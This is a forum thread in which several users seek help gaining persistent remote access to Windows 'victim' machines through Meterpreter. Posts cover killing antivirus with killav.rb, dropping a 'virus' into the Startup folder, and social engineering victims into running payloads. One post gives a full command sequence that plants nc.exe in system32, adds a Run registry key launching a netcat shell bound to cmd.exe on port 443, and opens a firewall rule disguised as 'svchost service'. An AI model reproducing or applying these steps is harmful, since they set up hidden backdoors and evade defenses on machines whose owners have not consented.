Forum Thread: Kali Linux Run Persistence

you can use the command killav.rb to kill the antivirus, but i am not sure if it terminates the AV definitely or if it will start again after reboot. I can't test it right now, if you do test it tell me what you see.

Otherwise, you can always write a script that desactivates the antivirus, run it before you make use of persistence

never mind forget the persistence i am trying to upload the virus on windowsXP to Startup folder then i can connect to victim's system in any time but when i write exploit -j window jump to the screen and ask me if i am sure to run this application can i do something for it? that won't ask the victim's system if i want to run it or not...

concerning the persistence i just checked the code of the killav, it appears it basically terminates the AV process. so the service would still have to be terminated.

Concerning the install prompt, as long as you plan to use an executable you can't. That doesn't mean that people won't install it. This is where social engineering takes place. Craft it so it seems legit.

Another solution would be to take advantage of another type of exploit for example I recently read about an interesting exploit using macros in the office suit. Generally speaking the victim will always need to do something, click on a link, execute a file, reconnect, ... . An attacker will try to force the victim to take said action, or will embbed said action in another one (hide the virus in another application install .....

no i understand of course but i want to connect to the victim's system without he clicks the app/link again i mean i can put the file on the first time when i hack into his system on start up folder i just check it and i can connect to the victim's system any time i want when it's in start up folder. but i am trying to put the virus in this folder and i can't so what i have done i just put it there from the windows xp machine

i skiped on the command: upload (.......exe) => c:\\documents and setting\\bla\\bla\blla\programs\\startup

i can't to that it's send me an error so this for now its my problem i can't upload my virus to victim's start up folder

i can't to that it's send me an error so this for now its my problem i can't upload my virus to victim's start up folder

has anyone else run into trouble establishing persistence with a meterpreter on a clean win7 machine? I can usually get it to run successfully if the process I'm injected into has system privs but even then trying to set up a service usually fails. any advice?

i run this commands:

1. upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
2. reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
3. reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
4. reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
5. netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443
6. netsh firewall show portopening

this is the command i run in kali linux and when i run in the terminal
nc -v (target ip) (port) its send me an error:unknown host and that is
any suggestions?

.